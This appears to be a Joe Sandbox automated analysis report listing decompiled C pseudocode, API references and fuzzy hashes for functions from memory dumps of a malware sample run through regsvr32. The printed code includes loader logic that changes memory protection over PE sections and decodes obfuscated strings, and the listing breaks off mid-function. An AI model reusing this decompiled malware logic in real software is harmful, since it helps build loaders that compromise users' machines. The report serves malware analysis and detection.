                                                  Function 005E111A, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E005E111A(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E005E163F(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                  0x005e1123
                                                  0x005e1128
                                                  0x005e1136
                                                  0x005e113b
                                                  0x005e113b
                                                  0x005e1141
                                                  0x005e1146
                                                  0x005e114a
                                                  0x005e114e
                                                  0x005e114e
                                                  0x005e1158
                                                  0x005e1161

                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 005E111D
                                                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 005E1128
                                                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 005E113B
                                                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 005E114E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$Priority$AffinityCurrentMask
                                                  • String ID:
                                                  • API String ID: 1452675757-0
                                                  • Opcode ID: 33a83d6eb5c873a46c9c4e6bbb8b16f684bb809f98140537dfce99a3eb9d76b8
                                                  • Instruction ID: 2ac0bb2c7d630a735f9cb9535a4fbbc268239ad0a98d638e14ae2a27a91f8b93
                                                  • Opcode Fuzzy Hash: 33a83d6eb5c873a46c9c4e6bbb8b16f684bb809f98140537dfce99a3eb9d76b8
                                                  • Instruction Fuzzy Hash: F1E09B312056516BD71D672A5C8DE6B6B5CEFA13307010235F550D72D0CB649D0595A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C873FD, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C873FD(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00C8A72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xc8d27c; // 0x41a5a8
				_t4 = _t24 + 0xc8ede0; // 0x10a9388
				_t5 = _t24 + 0xc8ed88; // 0x4f0053
				_t26 = E00C81262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xc8d27c; // 0x41a5a8
						_t11 = _t32 + 0xc8edd4; // 0x10a937c
						_t48 = _t11;
						_t12 = _t32 + 0xc8ed88; // 0x4f0053
						_t55 = E00C87CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0xc8d27c; // 0x41a5a8
							_t13 = _t35 + 0xc8ee1e; // 0x30314549
							if(E00C889D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0xc8d25c - 6;
								if( *0xc8d25c <= 6) {
									_t42 =  *0xc8d27c; // 0x41a5a8
									_t15 = _t42 + 0xc8ec2a; // 0x52384549
									E00C889D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0xc8d27c; // 0x41a5a8
							_t17 = _t38 + 0xc8ee18; // 0x10a93c0
							_t18 = _t38 + 0xc8edf0; // 0x680043
							_t45 = E00C82659(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0xc8d238, 0, _t55);
						}
					}
					HeapFree( *0xc8d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00C81F99(_t54);
				}
				return _t45;
			}

















                                                  0x00c873fd
                                                  0x00c8740d
                                                  0x00c87410
                                                  0x00c87417
                                                  0x00c87419
                                                  0x00c87419
                                                  0x00c8741c
                                                  0x00c87421
                                                  0x00c87428
                                                  0x00c87435
                                                  0x00c8743a
                                                  0x00c8743e
                                                  0x00c8744c
                                                  0x00c8745a
                                                  0x00c8745e
                                                  0x00c874ef
                                                  0x00c874ef
                                                  0x00c87464
                                                  0x00c87464
                                                  0x00c87469
                                                  0x00c87469
                                                  0x00c87470
                                                  0x00c8747c
                                                  0x00c8747e
                                                  0x00c87480
                                                  0x00c87482
                                                  0x00c87489
                                                  0x00c8749b
                                                  0x00c8749d
                                                  0x00c874a4
                                                  0x00c874a6
                                                  0x00c874ad
                                                  0x00c874b8
                                                  0x00c874b8
                                                  0x00c874a4
                                                  0x00c874bd
                                                  0x00c874c2
                                                  0x00c874c9
                                                  0x00c874e7
                                                  0x00c874e9
                                                  0x00c874e9
                                                  0x00c87480
                                                  0x00c874fb
                                                  0x00c874fb
                                                  0x00c874fd
                                                  0x00c87502
                                                  0x00c87504
                                                  0x00c87504
                                                  0x00c8750f

                                                  APIs
                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,010A9388,00000000,?,7519F710,00000000,7519F730), ref: 00C8744C
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,010A93C0,?,00000000,30314549,00000014,004F0053,010A937C), ref: 00C874E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C86814), ref: 00C874FB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 0c7179a1fa370b1d5edeb077ad952c3a23156157ac43480ce0e5cafc068dfddb
                                                  • Instruction ID: 706bdbcbafdac43ea150a5c14faabc2b8667436c1ba769789dfff95f01846f5e
                                                  • Opcode Fuzzy Hash: 0c7179a1fa370b1d5edeb077ad952c3a23156157ac43480ce0e5cafc068dfddb
                                                  • Instruction Fuzzy Hash: 16316D72901118BFDB11EBA0DC85FAE7BACEB44318F2501A6B611A7161E770DE05EF68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C88504, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E00C88504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xc8d340; // 0x10a8d39
				_push(0x800);
				_push(0);
				_push( *0xc8d238);
				if( *0xc8d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xc8d24c =  *0xc8d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00C82496(_t44, _t40); // executed
						_t18 = E00C8A66E(_t37, _t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xc8d24c < 5) {
								 *0xc8d24c =  *0xc8d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E00C8A1B0();
						RtlFreeHeap( *0xc8d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E00C8A279(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t24 = E00C88B94(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}












                                                  0x00c88504
                                                  0x00c88507
                                                  0x00c88508
                                                  0x00c88512
                                                  0x00c88519
                                                  0x00c8851e
                                                  0x00c88520
                                                  0x00c88526
                                                  0x00c8854e
                                                  0x00c88566
                                                  0x00c88568
                                                  0x00c88569
                                                  0x00c8856b
                                                  0x00c885a9
                                                  0x00c885a9
                                                  0x00c885af
                                                  0x00c885b5
                                                  0x00c885b5
                                                  0x00c8856d
                                                  0x00c88573
                                                  0x00c88576
                                                  0x00c88585
                                                  0x00c88587
                                                  0x00c8858e
                                                  0x00c885c2
                                                  0x00c885c7
                                                  0x00c885c9
                                                  0x00c885cb
                                                  0x00c885cb
                                                  0x00000000
                                                  0x00c885c9
                                                  0x00c88590
                                                  0x00c88595
                                                  0x00c885a3
                                                  0x00000000
                                                  0x00c885a3
                                                  0x00c8855d
                                                  0x00c88562
                                                  0x00c88562
                                                  0x00000000
                                                  0x00c88562
                                                  0x00c88528
                                                  0x00c88530
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8853f
                                                  0x00000000

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00C88528
                                                    • Part of subcall function 00C88B94: GetTickCount.KERNEL32 ref: 00C88BA8
                                                    • Part of subcall function 00C88B94: wsprintfA.USER32 ref: 00C88BF8
                                                    • Part of subcall function 00C88B94: wsprintfA.USER32 ref: 00C88C15
                                                    • Part of subcall function 00C88B94: wsprintfA.USER32 ref: 00C88C41
                                                    • Part of subcall function 00C88B94: HeapFree.KERNEL32(00000000,?), ref: 00C88C53
                                                    • Part of subcall function 00C88B94: wsprintfA.USER32 ref: 00C88C74
                                                    • Part of subcall function 00C88B94: HeapFree.KERNEL32(00000000,?), ref: 00C88C84
                                                    • Part of subcall function 00C88B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C88CB2
                                                    • Part of subcall function 00C88B94: GetTickCount.KERNEL32 ref: 00C88CC3
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00C88546
                                                  • RtlFreeHeap.NTDLL(00000000,00000002,00C8685F,?,00C8685F,00000002,?,?,00C82417,?), ref: 00C885A3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                  • String ID:
                                                  • API String ID: 1676223858-0
                                                  • Opcode ID: e9978c4cd67a01599e94d0ccc3418793f00ffe8c8f6274c7d632a09f35f9cbd6
                                                  • Instruction ID: 969973ba5fe35f603fda98fb9e63590225c51b608780b3fd095b3bcc5885121c
                                                  • Opcode Fuzzy Hash: e9978c4cd67a01599e94d0ccc3418793f00ffe8c8f6274c7d632a09f35f9cbd6
                                                  • Instruction Fuzzy Hash: BC2150B5200204EFEB11EF55DC84F9E37ACEB48759F104026F902DB260DB70EE45ABA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E1179, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E005E1179(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x5e414c;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}












                                                  0x005e1183
                                                  0x005e1190
                                                  0x005e1196
                                                  0x005e11a2
                                                  0x005e11b2
                                                  0x005e11b4
                                                  0x005e11bc
                                                  0x005e1251
                                                  0x005e1258
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x005e11c2
                                                  0x005e11c2
                                                  0x005e11c2
                                                  0x005e11c6
                                                  0x00000000
                                                  0x00000000
                                                  0x005e11d2
                                                  0x005e11d6
                                                  0x005e11fa
                                                  0x005e11fe
                                                  0x005e1212
                                                  0x005e1212
                                                  0x005e1218
                                                  0x005e1227
                                                  0x005e122b
                                                  0x005e1233
                                                  0x005e1233
                                                  0x005e123b
                                                  0x005e123e
                                                  0x005e124b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x005e124b
                                                  0x005e1206
                                                  0x005e120a
                                                  0x005e1210
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x005e1210
                                                  0x005e11de
                                                  0x005e11e2
                                                  0x005e11ec
                                                  0x005e11e4
                                                  0x005e11e4
                                                  0x005e11e4
                                                  0x00000000
                                                  0x005e11e2
                                                  0x00000000

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 005E11B2
                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 005E1227
                                                  • GetLastError.KERNEL32 ref: 005E122D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProtectVirtual$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1469625949-0
                                                  • Opcode ID: ce8808c7ed7d57795d431e301e571d3e78c2b61637b1966021a0c1a47c4ab84b
                                                  • Instruction ID: fdfc9731299768adfea1baaaae5665ca66c30b0b5fdeb3d91872f1c340929cf1
                                                  • Opcode Fuzzy Hash: ce8808c7ed7d57795d431e301e571d3e78c2b61637b1966021a0c1a47c4ab84b
                                                  • Instruction Fuzzy Hash: D5219131900606EFCB18CF96C885AAAFBF5FF54319F004859D18297441E378A699DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C83DD9, Relevance: 3.9, APIs: 3, Instructions: 155stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E00C83DD9(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0xc8d27c; // 0x41a5a8
				_t5 = _t40 + 0xc8ee40; // 0x410025
				_t85 = E00C86A12(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E00C89039(_v16);
					goto L24;
				}
				if(E00C8A72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E00C8809F(0,  *0xc8d33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0xc8d27c; // 0x41a5a8
					_t11 = _t52 + 0xc8e81a; // 0x65696c43
					_t55 = E00C8809F(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E00C86BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E00C89039(_t87);
					}
					if(_t80 != 0) {
						L17:
						E00C89039(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E00C81F99(_t86);
						}
						goto L22;
					} else {
						if(( *0xc8d260 & 0x00000001) == 0) {
							L14:
							E00C88F83(_t80, _v88, _v84,  *0xc8d270, 0);
							_t80 = E00C81C74(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E00C842EA( &_v40, 0);
							}
							E00C89039(_v88);
							goto L17;
						}
						_t67 =  *0xc8d27c; // 0x41a5a8
						_t18 = _t67 + 0xc8e823; // 0x65696c43
						_t70 = E00C8809F(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E00C86BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E00C89039(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}


























                                                  0x00c83deb
                                                  0x00c83dee
                                                  0x00c83df5
                                                  0x00c83dfb
                                                  0x00c83dfc
                                                  0x00c83dfd
                                                  0x00c83dfe
                                                  0x00c83dff
                                                  0x00c83e00
                                                  0x00c83e08
                                                  0x00c83e14
                                                  0x00c83e18
                                                  0x00c83e1b
                                                  0x00c83f6b
                                                  0x00c83f6e
                                                  0x00c83f72
                                                  0x00c83f72
                                                  0x00c83e2d
                                                  0x00c83e35
                                                  0x00c83f5e
                                                  0x00c83f5f
                                                  0x00c83f62
                                                  0x00000000
                                                  0x00c83f62
                                                  0x00c83e47
                                                  0x00c83e49
                                                  0x00c83e49
                                                  0x00c83e54
                                                  0x00c83e5b
                                                  0x00c83e5e
                                                  0x00c83f4d
                                                  0x00000000
                                                  0x00c83e64
                                                  0x00c83e64
                                                  0x00c83e69
                                                  0x00c83e72
                                                  0x00c83e77
                                                  0x00c83e80
                                                  0x00c83ea3
                                                  0x00c83e82
                                                  0x00c83e98
                                                  0x00c83e9a
                                                  0x00c83e9a
                                                  0x00c83ea6
                                                  0x00c83f41
                                                  0x00c83f44
                                                  0x00c83f4e
                                                  0x00c83f4e
                                                  0x00c83f53
                                                  0x00c83f55
                                                  0x00c83f55
                                                  0x00000000
                                                  0x00c83eac
                                                  0x00c83eb3
                                                  0x00c83ef4
                                                  0x00c83f05
                                                  0x00c83f1b
                                                  0x00c83f1f
                                                  0x00c83f24
                                                  0x00c83f2a
                                                  0x00c83f37
                                                  0x00c83f37
                                                  0x00c83f3c
                                                  0x00000000
                                                  0x00c83f3c
                                                  0x00c83eb5
                                                  0x00c83eba
                                                  0x00c83ec3
                                                  0x00c83ec8
                                                  0x00c83ecc
                                                  0x00c83eef
                                                  0x00c83ece
                                                  0x00c83ee4
                                                  0x00c83ee6
                                                  0x00c83ee6
                                                  0x00c83ef2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c83ef2
                                                  0x00c83ea6

                                                  APIs
                                                  • memset.NTDLL ref: 00C83DEE
                                                    • Part of subcall function 00C86A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00C83E14,00410025,00000005,?,00000000), ref: 00C86A23
                                                    • Part of subcall function 00C86A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00C86A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00C83E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00C83E2D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: 06c9558076e06a9147c768476909307030801dbdd7bbbf00447c3cb24692f499
                                                  • Instruction ID: 3481f94a92ca64af35b8251a463cb47a6d0d1b67b938d104a12e9f66b9255ba1
                                                  • Opcode Fuzzy Hash: 06c9558076e06a9147c768476909307030801dbdd7bbbf00447c3cb24692f499
                                                  • Instruction Fuzzy Hash: B6416D71A01218ABDB11FFE4CC85EEE7BBCEF08748B044565BA02E7151D7719E48AB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C89152, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 75%
                                                  			E00C89152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00C83AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xc8d27c; // 0x41a5a8
						_t20 = _t68 + 0xc8e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00C87C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                  0x00c89158
                                                  0x00c8915b
                                                  0x00c8916b
                                                  0x00c89174
                                                  0x00c89178
                                                  0x00c89246
                                                  0x00c8924c
                                                  0x00c8924c
                                                  0x00c89192
                                                  0x00c89197
                                                  0x00c8919b
                                                  0x00c891a1
                                                  0x00c891a6
                                                  0x00c891ad
                                                  0x00c891bc
                                                  0x00c891bc
                                                  0x00c891c0
                                                  0x00c891c2
                                                  0x00c891ce
                                                  0x00c891d9
                                                  0x00c891e4
                                                  0x00c891e8
                                                  0x00c891f2
                                                  0x00c891f6
                                                  0x00c891f8
                                                  0x00c891fd
                                                  0x00c89204
                                                  0x00c89214
                                                  0x00c89214
                                                  0x00c891fd
                                                  0x00c891f6
                                                  0x00c89216
                                                  0x00c8921b
                                                  0x00c89220
                                                  0x00c89220
                                                  0x00c89226
                                                  0x00c8922c
                                                  0x00c89231
                                                  0x00c89231
                                                  0x00c89236
                                                  0x00c8923b
                                                  0x00c8923b
                                                  0x00c89236
                                                  0x00c891c0
                                                  0x00c8923d
                                                  0x00c89243
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00C83AEF: SysAllocString.OLEAUT32(80000002), ref: 00C83B46
                                                    • Part of subcall function 00C83AEF: SysFreeString.OLEAUT32(00000000), ref: 00C83BAB
                                                  • SysFreeString.OLEAUT32(?), ref: 00C89231
                                                  • SysFreeString.OLEAUT32(00C81885), ref: 00C8923B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 4e9dfdcde350aeadffffda4bfaaf9ae50621e173f21f3f87b1dc58f1a6b95c4a
                                                  • Instruction ID: a141daf5077df61335271253ef350c011520e672a2e10826a4ae19837ea19b13
                                                  • Opcode Fuzzy Hash: 4e9dfdcde350aeadffffda4bfaaf9ae50621e173f21f3f87b1dc58f1a6b95c4a
                                                  • Instruction Fuzzy Hash: 64314A72900119BFCB15EFA5C888CAFBB7AFFC97447144658F8159B220E231EE51DBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E135A, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E005E135A() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x5e4150;
				if( *0x5e412c > 5) {
					_t16 = _t15 + 0x5e50f9;
				} else {
					_t16 = _t15 + 0x5e50b1;
				}
				E005E1FE7(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E005E1414( &_v32,  &_v16,  *0x5e414c ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x5e4138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E005E102F(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x5e4138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E005E200D(_t44, _t32 + 4);
						}
					}
					_t25 = E005E1E11(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                  0x005e1360
                                                  0x005e1371
                                                  0x005e137b
                                                  0x005e1373
                                                  0x005e1373
                                                  0x005e1373
                                                  0x005e1382
                                                  0x005e138b
                                                  0x005e1390
                                                  0x005e13ae
                                                  0x005e1405
                                                  0x005e13b0
                                                  0x005e13b6
                                                  0x005e13bc
